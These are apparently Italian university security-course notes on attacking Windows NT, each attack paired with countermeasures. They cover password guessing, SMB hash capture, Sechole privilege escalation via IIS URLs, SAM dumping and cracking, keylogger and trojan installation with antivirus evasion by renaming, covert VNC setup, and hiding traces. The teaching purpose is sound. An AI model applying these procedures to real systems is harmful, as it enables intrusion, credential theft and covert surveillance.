5. Hacking Windows NT

NT detiene una grande "fetta" di controllo delle reti (network) e dei computer del mondo sia nell'ambito del pubblico che del privato.

Perchè?

  • Microsoft persegue una linea commerciale molto aggressiva.
  • NT è abbastanza intuitivo da usare in quanto ha un’ interfaccia grafica (GUI).

Le altre caratteristiche, non commerciali, che hanno permesso una grande diffusione di NT sono:

  • NT non permette l'esecuzione di codice in remoto nella memoria locale del server. Quindi ogni programma lanciato dal client,viene eseguito nella memoria locale del client.
  • Grazie ai continui Service Pack (gli ultimi sono sp6a e sp6b), NT è diventato abbastanza sicuro come UNIX.
  • Windows NT funziona come NFS (Network File System) ad eccezione di Windows NT Terminal Server che prevede una multi-user GUI ( Graphic User Interface ) shell utilizzabile in remoto. Tale caratteristica è inclusa in NT 5.0 ovvero Windows 2000 Server. 
  • La possibilità di connettersi alle consolle del server è ristretta solo agli account degli amministratori, cioè non permette la connessione locale agli utenti che non siano Amministratori o appartenenti al gruppo Administrator.

E' proprio a causa di quest'ultimo punto, che la conoscenza della password è così appetitosa per gli hacker! Per la comunità degli hacker fu di grande aiuto, nell'attacco alla sicurezza di NT, il documento di "Hoobit" dell'Avian Research su CIFS (Common Internet File System) e SMB (Server Message Block) che sono alla base dell'architettura di rete di NT (http://www.insecure.org/stf/cifs.txt).  Ed è proprio qui che risiede il tallone di Achille di NT, dato che si ha la necessità di mantenere la compatibilità verso il basso, cioè con i protocolli NETBIOS e CIFS, e perciò si usa il vecchio algoritmo Lan Manager per criptare le password utenti. E' proprio su questo "buco" che gli hackers sfoderano i propri artigli. 

  • Documento di Hoobit 

5.1 Password Guessing

L'obiettivo degli hacher è quello di impossessarsi dei privilegi dell' Amministratore del sistema e quindi, per far ciò, si ha la necessita di conoscere la password dell’account Administrator, in quanto è solo quest'ultimo che può loggarsi, in locale, alla console del server,che può installare/disinstallare pacchetti software e driver, che può amministrare la rete e gli account, ma soprattutto le loro password ed i servizi del sistema.

Ci sono 3 modi per tentare di trovare ( guessing ) le password degli account di NT:

  • manuale
  • automatico
  • ascoltando la rete (sniffer) quando avviene il logon del client ( auditing di rete ).

5.1.1 Manual Password Guessing

Con ciò si intende la ricerca della password di un determinato account in modo manuale, cioè tentando di indovinare una possibile password.

Di solito le prime password che vengono provate sono:

  • Username.
  • Nome.
  • Cognome.
  • Il nome della società per cui lavora l’utente.
  • La data di nascita.
  • Il numero di telefono.
  • etc..
Quindi è errato scegliere una password sopraelencata o una troppo facile, perché equivale ad una password inesistente!

Nella fase di installazione di alcuni programmi che girano sotto NT,  vengono creati degli account di sistema (system account), con privilegi elevati. Di solito questi account sono conosciuti e forse anche le password di default (che di solito sono nulle).

Ad esempio: IUSR<nome server> viene creato da Internet Information System (IIS) che è il software necessario per amministrare un server Web su NT.

Se NT è in rete locale, un attaccante può tentare di accedere alle risorse condivise oppure prova ad indovinare le password degli account locali presenti sui  server o workstation NT che invece degli account globali presenti sui PDC (Primary Domain Controller: server primario che controlla la sicurezza del dominio) che sono più protetti.

5.1.2 Automatic Password Guessing

Come sempre, il grande buco in una rete è la password nulla. Ma comunque si tenta anche l'indovinare le password ed il compito ci viene facilitato da dei programmi che automaticamente ne effettuano la ricerca. Ad esempio;

  • Legion v. 2.1
  • NAT (NetBIOS Auditing Tool)
5.1.3 Auditing di Rete

Se un attaccante è capace di captare lo scambio del login effettuato al momento del logon, può tentar di effettuare la ricerca della coppia utente/password.Ciò può esser fatto facilmente mediante il software L0phtcrack creato dal gruppo L0pht Heavy Ind. (http://www.l0pht.com).

Questo software di solito lavora off-line, in modo che il database delle password di NT non bloccato. Permette anche la cattura dei pacchetti SMB creati al momento del login fra i sistemi NT e Windows Client (Windows 9x). Utilizzando tale tool la rete può essere sniffata per un periodo elevato di tempo e quindi in pochi giorni la password può esser trovata. La rete può esser anche protetta da tutto ciò, ma l’ostacolo può esser aggirato nel modo seguente:

"Spedisci una e-mail al tuo obiettivo, ed includi un link tipo:

//yourcomputer/sharename/message.html

Quando la persona cliccherà su tale link invierà a te, il valore hash

della propria password per l'autenticazione e quindi verrà

catturato".

5.1.4 Cattura pacchetti SMB

In questa sezione verrà illustrato, brevemente, come funziona l'hand-shake dei valori challenge fra il client ed il server, necessari alla convalida del login. Per un ulteriore approfondimento pùo esser consultata la tesina su Windows NT (http://www.dia.unisa.it/ads.dir/corso-security/www/CORSO-9900/windowsNT/index.htm).

 

Se la lunghezza della password è minore di 7 caratteri la seconda metà è della password sarà:

0xAAD3B435B51404EE

Ora supponiamo che il valore hash LM (LanManager) della password utente sia

0xC23413A8A1E7665FAAD3B51404EE1122

 

 
  1. 0xC23413A8A1E7665FAAD3B51404EE1122
  2. 0xC23413A8A1E7665FAAD3B51404EE11220000000000 ( 5 byte nulli)

Vengono aggiunti i 5 byte nulli dato che l'intera stringa deve esser lunga 21 byte, in modo che può esser suddivisa in 3 parti uguali, ciascuna di 7 byte, ed ogni parte è utilizzata come chiave DES per criptare il valore del challenge inviato ad A dal server B nel passo seguente:

 

Viene effettuata la concatenazione dei 3 risultati e tale stringa viene inviata al server B che effettua le medesime operazioni sul challenge iniziale e confronta il suo risultato con quello di A.

5.1.5 Contromisure Auditing di Rete

Per evitare la cattura dei pacchetti SMB possiamo adottare alcune contromisure.

  • Se il server NT è un host Internet non dovrebbe rispondere a richieste di risorse condivise. Quindi bloccare, con un firewall, gli accessi alle porte 135 e 139 (TCP). Tali porte sono relative ai servizi
    • 135 : ntrpc.
    • 139 : netbios.
  • Disabilitare il binding WINS (Windows Internet Name Service) client per le schede di rete connesse ad una rete pubblica.
  • Per gli host che da un lato si affacciano su Internet e dall’altro su una Intranet, il servizio Netbios può esser disabilitato dal lato Internet e può esser lasciato attivo per la rete locale (LAN).
  • Utilizzare delle politiche di account più severe.

 

Pannello di controllo per settare la politica di account su un server NT che fa da PDC

Event log: Tentativo di connesssione fallito

 
  • Utilizzare le password con le lettere maiuscole e minuscole insieme ai numeri, etc.. Ciò è possibile con Windows NT aggiornato minimo con il Service Pack 2.
  • Per evitare lo sniffer di rete e quindi la cattura dei pacchetti SMB, bisogna disabilitare la possibilità, da parte di NT, di accettare le richieste da client inferiori ad NT e ciò può esser fatto aggiungendo nel registro di NT 4.0 (vedi immagine seguente – campo evidenziato), il valore 4 – non accettare richieste di autentificazione LanMan su DC (PDC o BDC) dove DC sta per Domain Controller.

Modifica alla voce Incompatibilylevel del registro di NT

 
Contro: non è possibile, in realtà, applicare l’ultima contromisura perchè Windows9x è più diffuso di Windows NT WorkStation. Gli SMB possono esser criptati ma i client Win9x non effettuano ciò. Possono esser attivate politiche di auditing, ma ciò causa uno spreco di risorse di CPU e di spazio su HardDisk.

 

Elenco di eventi sulla sicurezza avvenuti su un server NT.

  • In ultimo possono essere usati dei software di real time distinction intrusion ( BlackIce, SeNTry, etc. ), cioè dei software capaci di capire se vi è un’intrusione nel nostro sistema o se è attivo uno sniffer in tempo reale, analizzando, man mano, i pacchetti di rete letti.

5.2 Aumento dei Privilegi (Privilege Escalation)

Con ciò indichiamo il processo che permette di avere dei privilegi maggiori rispetto a quelli "ottenuti" avendo crakkato la password di un normale utente autorizzato, di modo che si possano eseguire dei particolari comandi che solito sono dell'amministratore.

5.2.1 Hoovering Information

L'hoovering information è quel procedimento mediante il quale un intruso, avendo scoperto un account globale, ma non appartenente al gruppo Administrator,  tenta di ottenere delle informazioni che gli permettano di aumentare le proprie conoscenze sul sistema, di modo che, ottenendo sempre più informazioni cerca di scoprire la password dell’amministratore.

Queste informazioni possono esser estrapolate dalle directory:

  • \system32 ( presente sotto la dir. C:\WINNT )
  • \repair.
  • directory del web o ftp (Inetpub).
  • oppure prelevandole dal file di registro usando il tool regdump o srvinfo appartenente ad NTRK (NT Resource Kit).

5.2.2 Sechole

Un applicativo che permette l' Hoovering Information è Sechole, il quale addiziona  l'utente corrente al gruppo Amministratori. Sechole modifica le istruzioni in memoria degli Open Process API in modo che si attacca ad un processo privilegiato. Quindi, ottenuti i privilegi, permette di aggiungere l’utente corrente al gruppo Administrators. 

http://www.ntsecurity.net/security/sechole.html

Sechole deve essere eseguito localmente sul sistema da attaccare e se sull'obiettivo gira IIS vi sono altre opportune condizioni per la sua esecuzione in quanto può esser lanciato da remoto, addizionando l’account Internet (IUSR_nome_pc) al gruppo Administrator o Domain Administrator.

5.2.2.1 Esecuzione di Sechole in remoto
  1. L'attaccante deve avere accesso alle dir IIS in cui è possibile W/R. (dir Mail, News, cgi-bin, scripts, _vti_bin, etc ).
  2. Copiarvi Sechole (exe +DLL), cmd.exe (Interp. Comm. NT), ed ntuser (www.pedestalsotware.com).
  3. Eseguire sechole attraverso il web browser.
  4. Per bypassare le necessità di loggarsi con IUSR (la cui password è sconosciuta) gli hachers tendono ad inserire un nuovo utente con l'utility ntuser.

Esempio:

http://192.168.202.154/scripts/sechole.exe

http://192.168.202.154/scripts/cmd.exe?/ c:\inetpub\scripts\ntuser.exe –s corp1 add mallory –password secret

5.2.2.2 Contromisure da Sechole

Le contromisure per evitare l'esecuzione di processi lanciati da sechole sono:

  • Applicare la patch per Sechole della Microsoft (priv-fix:KB Q190288).
  • Non permettere gli accessi in scrittura nelle directory di IIS.
  • Bloccare le porte TCP 135 e 139.
  • Disabilitare l'accesso FTP in scrittura.
  • Attivare il auditing sul privilegio di esecuzione sul WEB Server.
  • Selezionare la protezione sulle directory per ciò che riguarda l’esecuzione.

5.2.3 Trojan Application Virus

Un trojan è un programma che ha apparentemente una funzione innocua, ma effettua qualcosa di totalmente differente da quel che può sembrare. La sua funzione è quella di un "cavallo di troia" e quindi da qui il nome. Un esempio:

 Un intruso potrebbe cambiare

         regedit.exe in regedit.cmd (file batch)

e quindi prima di regedit.exe verrà eseguito regedit.cmd il quale potrebbe eseguire:

          net localgroup admnistrator <user> /add

cioè aggiunge l'utente <user> al gruppo locale degli Amministratori.

Dei tipici programmi trojan sono BackOrifice2000 e NetBus..

5.2.4 Chiavi del Registro eseguibili

Un file Batch può esser eseguito anche mediante l’ausilio di valori specifici del registro di NT che permettono l'esecuzione dei file e tali valori, presenti in CurrentVersion, sono:

  • Run – everyone - tutti
  • RunOnce – server operators - tutti
  • RunOnceEx – everyone - tutti
  • WinLogon – server operators - userinit

Nota: L'accesso remoto al registro è permesso al gruppo Administrator ed agli utenti che hanno accesso alla consolle in locale.

Contromisure

Per proteggere il file di registro da manipolazioni non autorizzate bisogna settare i permessi delle chiavi precedenti a:

  • CREATOR OWNER: Full control.
  • Administrator: Full control.
  • SYSTEM: Full Control.
  • Everyone: Read.

5.3 Cracking SAM (Security Accounts Manager)

Il Database SAM contiene i nomi utenti e le password criptate di tutti gli utenti locali o del dominio se il server NT è un PDC (Primary Domain Controller). In base al criterio di compatibilità, Windows NT usa una funzione hash per criptare le password di tipo one-way. NT oltre a memorizzare le password secondo il vecchio standard Lanman per la compatibilità con Window 9x usa anche un nuovo algoritmo per i sistemi NT. Quindi il tallone di Achille è l'algoritmo per lo standard LanManager del quale si è riusciti ad invertire la funzione hash ed ora la difficoltà nello scoprire una password è dovuta alla sua composizione e non alla difficoltà computazionale.

Esistono vari tools per effettuare la ricerca delle password fra cui il più potente è L0phtcrack

www.l0pht.com

Tali algoritmi, possono usare anche un elenco di parole (http://coast.cs.purdue.edu) ed utilizzando quest’ultime come input degli algoritmi che effettuano la criptazione della password, confrontando il risultato con il valore hash della password dell' account reale.

Schermata di L0phCrack

Come facciamo ad ottenere il database SAM?

Da:

  • dir %systemroot%s\system32.
  • nel file di registro sotto la voce Hkey_Local_Machine\SAM.
  • effettuando lo sniffer di rete quando avviene il logon per ottener la stringa hash.
  • nella dir %systemroot%\repair. Qui il file è compresso e deve esser decompresso con expand sam._sam.

Le informazioni da SAM possono esser estrapolate con il tool pwdump e pwdump2 (per database SAM criptati con l’opzione SYSKEY incluso solo in  NT aggiornato con il sp2 o superiore).

Estrazione dei dati sugli account dal registro di NT usando pwdump2

5.4 Cracking NT Password

Usando l'utility L0phtcrack, il cracking delle password può esser fatto in modo molto semplice. Tale software permette la lettura dei dati del db SAM, effettua la cattura dei pacchetti di rete su una LAN inviati al momento del logon fra i clients ed il server ( www.dia.unisa.it/ads.dir/corso-security/www/CORSO-9900/sniffer/index.htm ) ed effettua il cracking delle password degli account di NT usando per l'attacco  un’elenco di parole oppure effettuando un attacco di tipo esaustivo. Se sul sistema è attivo SYSKEY bisogna prelevare prima i dati dal SAM con pwdump2 e salvarli in un file. Quindi aprire tale file con L0phtcrack e farlo elaborare. La lunghezza della password è 14 caratteri. Se tale lunghezza è  minore di 14 caratteri, allora le posizioni restanti sono riempite con degli spazi vuoti. La parola viene divisa in 2 sottostringhe di 7 caratteri, criptate separatamente e poi concatenate. 

Con un attacco di forza brutta ci vogliono circa 24h per ricercare tutte le password. Se la prima stringa è costituita da 7 caratteri alfanumerici e la seconda dai soli primi 5 caratteri ci vogliono circa 60s con un PENTIUM per "crakkare" la seconda stringa.

L0phcrack si basa sull’algoritmo DES ottimizzato per Pentium ,Pentium MMX e PRO, e Pentium II con un incremento di prestazioni del 450% su tali processori. Mediamente tutte le password alfanumeriche vengono trovate in circa 24h su P2/450Mhz

Tempi medi di ricerca

Alfanumeriche 5.5H
Alfanumeriche + simboli 45H
Alfanumeriche +simboli+segni di punteggiatura 48H

Esempi:

1) Lettura dei dati SAM su un pc remoto.

Qui vieni inserito il nome NETBIOS del PC da cui si vuole prelevare i dati sugli account

Opzioni di L0phcrack

Dati Prelevati

 

Elaborazione:

  • Il 50% delle password è stato trovato.
  • In alto vi sono delle informazioni relative all'andamento dell'elaborazione come chiave usata, % dello spazio delle chiavi usato, tempo rimanente stimato e prove effettuate al sec..

 

2) Lettura dei dati SAM dal file presente in  %systemroot%\repair.

Estrapolazione dei dati dal registro di NT con l'utility pwdump2.E' necessario tale passaggio se il db SAM usa l'opzione SYSKEY

 

Aperura del File

Dati prelevati e pronti per esser elaborati

5.4.1 Contromisure Cracking NT password

  • Utilizzare delle password lunghe almeno 13 caratteri.

  • Abilitare l'opzione SYSKEY (encr. 128bit contro i 40bit di default) eseguendo dalla console MS-DOS di Windows:  syskey. Tale opzione e presente in Windows NT aggiornato minimo al Service Pack 2.

  • Proteggere il file SAM mediante i permessi sul file.

Per un ulteriore approfondimento pùo esser consultata la tesina su Windows NT (http://www.dia.unisa.it/ads.dir/corso-security/www/CORSO-9900/windowsNT/index.htm).

5.5 Keystroke: IKS 

I keystroke loggers sono dei programmi sthealth che simulano la tastiera e memorizzano ogni tasto premuto in  file di log..

Ad esempio: IKS. IKS è esenzialmente un device di tastiera che gira nel kernel di NT ed è capace di registrate anche la combinazione CTRL-ALT-CANC usata per far apparire la finestra di logon. Per installare IKS da remoto seguire i seguenti passi ( sul  file readme.txt ciò è spiegato in dettaglio ):

  1. Copiare il file iks.sys in /system32/drivers. Per rendere il file invisibile ad eventuali antivirus, bisogna rinominare il file, ad esempio in ikk.ett .
  2. Lanciare, sul computer remoto, il file .reg fornito insieme a IKS.
  3. Effettuare il reboot con comando per lo shutdown remoto:                                 

          shutdown //<ip_ind> /R /T:1 /Y /C 

  4. Utilizzare datview.exe per leggere il file log.
Pannello del setup di IKS

5.6 Controllo Remoto

Il controllo remoto permette di comandare a distanza un altro PC. Due utility sono fornite con il cd di NT Resource Kit per poter eseguir comandi in remoto e sono:

  • Remoto.exe ( Remote Command Line ).
  • Rcmd.exe (Client) e rcmdsvc.exe (Server) ( Remote Command Service ).

Come dobbiamo usare tali utility?

  • Rcmdsvc.exe deve essere installato ed eseguito come un servizio.
  • Remote.exe è un file eseguibile che può esser lanciato in modalità client (/c) o server (/s).

Quindi:

  • Bisogna connettersi alla risorsa condivisa C$ come utente Admin. e copiare Remote.exe nella sottodirectory  %systemroot%\system32.
  • Eseguire remote.exe attraverso AT sul sistema remoto:

                    at  <ind_ip>  <time>  ""remote /s cmd secret""

    Quindi eseguire, in locale, remote /C <ind_ip> secret  .

    Nell'esempio precedente nel file copia.bat e presente il comando remote /s cmd secret.

5.6.1 NetBus (www.netbus.org)

NetBus come BackOrifice2000 è un programma che viene catalogato, dai vari antivirus (vedi NortonAntivirus 5.0), come trojan-virus (vedi www.dia.unisa.it/ads.dir/corso-security/www/CORSO-9900/virus/index.htm ).

Netbus è un programma client\server dove il server è il file NETBUS.EXE ed il client è PATCH.EXE. Il file PATCH.EXE deve essere eseguito prima di NETBUS.EXE.     

Nota:  rinominare PATCH.EXE per nasconderlo dagli antivirus e cambiarne anche l’estensione.

  • Il server può esser installato su un client come allegato di una e-mail oppure copiare il file PATCH.EXE in %systemroot%\system32.
  • Eseguire PATCH.EXE dal prompt dei comandi remoto.

Quindi lanciare dal pc locale NETBUS.EXE.

 
Comandi di NetBus 1-70

5.6.2 BackOrifice 2000

BackOrifice 2K ha fatto la sua prima comparsa il 10 Luglio 1999 con la versione 1. Anche BO2K è un programma client/server. Può esser facilmente scoperto da un buon antivirus, ma il server può esser facilmente riconfigurato per non esser riconosciuto ( rinominare il file, cambiare le impostazioni, etc ..).

I file appartenenti al programma BO2K. Prima...

 
Il file wwwwert.exe è stato rinominato b.ewr per non esser scoperto dall'antivirus NAV50

 

Pannello di controllo di BO2K. Il pc con nome NETBIOS Alfsac è sotto controllo remoto. La prova è stata effettuata su una LAN
 

5.6.3 Contromisure per NetBus e BackOrifice 2K

La principale contromisura è quella di verificare la correttezza del file di registro e quindi eliminare quelle voci non più necessarie perché facenti riferimento a file o programmi inesistenti, ma soprattutto sconosciuti.Quindi:

  • Verificare la cartella dei file che vengono eseguiti alla partenza di Windows (startup).
  • Verificare che sulle porte TCP 12345 e 20034 non vi siano dei processi sconociuti nello stato di listening.
  • Utizzare un buon “netbus cleaner” (antivirus).

 

5.6.4 VNC (Virtual Network Computing) (www.uk.research.att.com)

  

E' un software realizzato dalla AT&T. E' Veloce ed è difficile individuarne la presenza, ma soprattutto è freeware. I passi per configurare VNC sono:
  • Copiare i file WINVNC.EXE, VNCHooks.DLL e OMNITHREAD.DLL sul server obiettivo in %systemroot% e dargli l’opzione hidden files.
  • Settare la password per VNC.
Pannello per il setup di WinVNC
  • Inserire nel registro, con il comando regini, i dati di Winvnc.ini nel seguente modo:
    •   regini –m \\ind_server winvnc.ini
  • Installare WinVNC come servizio ed attivarlo tramite il comando:
    • winvnc –install.

 

  • Eseguire net start winvnc per attivarlo.

Lista dei Processi attivi.  Task Manager di Win2K Server.  Notare il processo WinVNC

  • Quindi usare vncviewer.exe per connettersi all’obiettivo.

 

 5.6.5 Contromisure per il Controllo Remoto

Le seguenti regole sono necessarie per proteggersi da attacchi di controllo remoto.Verificare:

  • Processi
    • Analizzare la lista dei processi attivi tramite task manager o il comando AT.
    • Kill quelli sospetti.
  • Voci nel Registro
    • Verificare la non esistenza delle seguenti voci nel file di registro:
      • HKEY_USERS\DEFAULT\SOFTWARE\ORL\WINVNC3.
      • HKEY-LOCAL-MACHINE\SOFTWARE\NetSolution\NetBus Server.
    • Controllare che non vi siano chiamate a programmi sospetti in HKLM\software\microsoft\windows\currentversion\Run e RunOnce, RunOnceEx, RunServices.
    • Agli utenti che non appartengono al gruppo degli amministratori, vietare l’accesso alle sopraelencate chiavi del registro. Per default  NT setta il permesso ad "EVERYONE“ alle voci precedenti. Quindi settare i permessi d' accesso al file di registro tramite l'opzione  security|permission setting nel programma regedt32.
  • Filename
    • Verificare la non presenza dei file come remote.exe, NBSrv.exe e Patch.exe, WinVNC e le relative DLL.
    • Verificare che in: StartMenu\PROGRAMS\STARTUP\%username% non ci siano dei file sconosciuti o sospetti.
  • Porte
    • Se Remote.exe è stato rinominato, mediante il comando netstat del s.o. Windows si può verificare se vi sono delle connessioni attive sulle porte UDP e TCP. Una connessione effettuata con Remote usa la porta TCP 139.
    Porte TCP presenti ed attive sul PC. Notare che sulla porta TCP 139 è in esecuzione un processo in stato di listening

     
  • Bloccare gli accessi alle porte TCP 135 e 139 con un firewall.

 

5.7 Nascondere le Tracce

Con ciò si intende tutti quei trucchi necessari per nascondere eventuali tracce di attacchi oppure della presenza dei file necessari per il controllo remoto, in modo che le volte successive non sia più necessario efffettuare un attacco in toto. In poche parole lasciamo dei passaggi "segreti" e quindi delle porte aperte.

 

5.7.1 Disabilitare l'Auditing
Con l'ausilio del programma auditpol  (NTRK) un intruso può abilitare/disabilitare l'AUDITING di certi eventi, in modo da non destar sospetti da parte degli amministratori a causa del verificarsi di determinati eventi, oppure può cancellare il file di event log.   
Elenco degli eventi riguardanti la sicurezza catturati da Event Viewer (NT 4.0 Server).E' bene leggere tale elenco per capire se c'è qualche problema dal punto di vista della sicurezza.
 

5.7.2 Nascondere i File 

Vi sono due modi per nascondere i file e sono:

1) La più classica, ma facilissima da scoprire, è mediante l’ausilio del noto comando ATTRIB.

2) La più sofisticata e performante è quella che fa uso di NTFS (WINDOWS NT FILE SYSTEM). NTFS offre il supporto per vari flussi di informazioni presenti in un file. MICROSOFT (http://www.miscrosoft.com/italy) definisce tale funzionalità come un ampliamento degli attributi di un file senza ristrutturarlo, cioè è possibile usare un file sia con un s.o. Windows e sia Unix o Mac. Gli hackers, quindi,  preferiscono questo sistema.

Per effettuare queste operazioni viene usata l'utility posix cp presente in NTRK. La sintassi è:
  • Modalità Stream:        cp <file> oso001.009:<file>           per nascondere il file.
  • Modalità Unstream:    cp oso001.009:<file> <file>           per scoprirlo.
L'esecuzione di tali file avviene tramite il comando start.
  •       start oso001.009:<file>
5.7.3 Contromisure 
L’unico tool capace di ricercare tali stream file è March Information Systems’ Streamfinder (IIS) ( http://europe.iss.net/streams ).